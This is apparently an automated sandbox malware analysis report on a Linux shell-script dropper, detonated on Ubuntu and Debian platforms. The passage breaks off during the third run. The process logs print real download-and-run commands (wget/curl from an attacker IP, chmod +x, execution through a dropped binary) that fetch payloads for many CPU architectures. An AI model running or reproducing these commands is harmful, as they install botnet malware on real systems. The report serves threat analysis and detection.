Malware Analysis Report

2025-04-03 19:11

Sample ID 241121-krz75s1ekq
Target f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh
SHA256 f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1

Threat Level: Shows suspicious behavior

The file f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-21 08:50

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-21 08:50

Reported

2024-11-21 08:54

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

2s

Max time network

131s

Command Line

[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /tmp/3AvA N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/IGxModz.mpsl /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm6 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm7 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.ppc /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.m68k /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.x86 /usr/bin/curl N/A
File opened for modification /tmp/3AvA /tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh N/A
File opened for modification /tmp/IGxModz.mips /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm4 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm5 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.sh4 /usr/bin/curl N/A

Processes

/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh

[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.x86]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.x86]

/bin/cat

[cat IGxModz.x86]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA x86]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.mips]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.mips]

/bin/cat

[cat IGxModz.mips]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA mips]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.mpsl]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.mpsl]

/bin/cat

[cat IGxModz.mpsl]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA mpsl]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm4]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm4]

/bin/cat

[cat IGxModz.arm4]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA arm4]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm5]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm5]

/bin/cat

[cat IGxModz.arm5]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA arm5]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm6]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm6]

/bin/cat

[cat IGxModz.arm6]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA arm6]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm7]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm7]

/bin/cat

[cat IGxModz.arm7]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA arm7]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.ppc]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.ppc]

/bin/cat

[cat IGxModz.ppc]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA ppc]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.m68k]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.m68k]

/bin/cat

[cat IGxModz.m68k]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA m68k]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.sh4]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.sh4]

/bin/cat

[cat IGxModz.sh4]

/bin/chmod

[chmod +x 3AvA config-err-gACG2o f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 netplan_4tig9c16 snap-private-tmp ssh-zntWNVcxk98c systemd-private-3e892b2e10504022a70d94fecf5dc4e7-bolt.service-tkmHeq systemd-private-3e892b2e10504022a70d94fecf5dc4e7-colord.service-deBSYp systemd-private-3e892b2e10504022a70d94fecf5dc4e7-ModemManager.service-t5VM7n systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-resolved.service-nHmr6O systemd-private-3e892b2e10504022a70d94fecf5dc4e7-systemd-timedated.service-nPo1H1]

/tmp/3AvA

[./3AvA sh4]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
US 151.101.193.91:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.6:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp

Files

/tmp/IGxModz.x86

MD5 960b4fa9d5383373f0a1ea04929df01b
SHA1 f78054d817db7742162a706b5d9f1fedcdf21140
SHA256 3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a
SHA512 2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-21 08:50

Reported

2024-11-21 08:54

Platform

debian9-armhf-20240729-en

Max time kernel

8s

Max time network

9s

Command Line

[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /tmp/3AvA N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3AvA /tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh N/A
File opened for modification /tmp/IGxModz.mpsl /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm4 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm7 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.ppc /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.sh4 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.x86 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.mips /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm5 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm6 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.m68k /usr/bin/curl N/A

Processes

/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh

[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.x86]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.x86]

/bin/cat

[cat IGxModz.x86]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA x86]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.mips]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.mips]

/bin/cat

[cat IGxModz.mips]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA mips]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.mpsl]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.mpsl]

/bin/cat

[cat IGxModz.mpsl]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA mpsl]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm4]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm4]

/bin/cat

[cat IGxModz.arm4]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA arm4]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm5]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm5]

/bin/cat

[cat IGxModz.arm5]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA arm5]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm6]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm6]

/bin/cat

[cat IGxModz.arm6]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA arm6]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.arm7]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.arm7]

/bin/cat

[cat IGxModz.arm7]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA arm7]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.ppc]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.ppc]

/bin/cat

[cat IGxModz.ppc]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA ppc]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.m68k]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.m68k]

/bin/cat

[cat IGxModz.m68k]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA m68k]

/usr/bin/wget

[wget http://154.213.189.14/bns/IGxModz.sh4]

/usr/bin/curl

[curl -O http://154.213.189.14/bns/IGxModz.sh4]

/bin/cat

[cat IGxModz.sh4]

/bin/chmod

[chmod +x 3AvA f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x86 systemd-private-03455c2c38204d4281d2c621b8211e1b-systemd-timedated.service-fy9xdE]

/tmp/3AvA

[./3AvA sh4]

Network

Country Destination Domain Proto
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp
NL 154.213.189.14:80 154.213.189.14 tcp

Files

/tmp/IGxModz.x86

MD5 960b4fa9d5383373f0a1ea04929df01b
SHA1 f78054d817db7742162a706b5d9f1fedcdf21140
SHA256 3e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a
SHA512 2d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-21 08:50

Reported

2024-11-21 08:54

Platform

debian9-mipsbe-20240611-en

Max time kernel

29s

Max time network

31s

Command Line

[/tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A
N/A /tmp/3AvA /tmp/3AvA N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A
N/A N/A /tmp/3AvA N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/IGxModz.mips /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.mpsl /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm4 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm5 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.arm7 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.ppc /usr/bin/curl N/A
File opened for modification /tmp/3AvA /tmp/f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1.sh N/A
File opened for modification /tmp/IGxModz.arm6 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.m68k /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.sh4 /usr/bin/curl N/A
File opened for modification /tmp/IGxModz.x86 /usr/bin/curl N/A

Processes

